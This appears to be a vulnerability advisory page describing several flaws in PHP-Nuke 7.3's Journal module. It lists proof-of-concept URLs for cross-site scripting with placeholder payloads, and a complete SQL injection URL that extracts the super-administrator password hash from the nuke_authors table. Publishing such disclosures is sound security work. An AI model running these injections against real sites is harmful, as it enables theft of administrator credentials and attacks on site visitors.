• info
• discussion
• exploit
• solution
• references

PHP-Nuke Multiple Vulnerabilities

No exploit is required.

The following proof of concept examples are available:
http://www.example.com/nuke73/modules.php?name=Journal&file=friend&jid=2&yun=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=friend&jid=2&ye=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=add&filelist[]=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=modify&filelist[]=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=delete&jid=[xss
code here]&forwhat=waraxe
http://www.example.com/nuke73/modules.php?name=Journal&file=comment&onwhat=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=commentsave&rid=[xsscode here]

http://www.example.com/nuke73/modules.php?name=Journal&file=commentkill&onwhat=1
http://www.example.com/nuke73/modules.php?name=Journal&file=savenew&title=f00bar

http://www.example.com/nuke73/modules.php?name=Journal&file=search&bywhat=aid&exact=1
&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*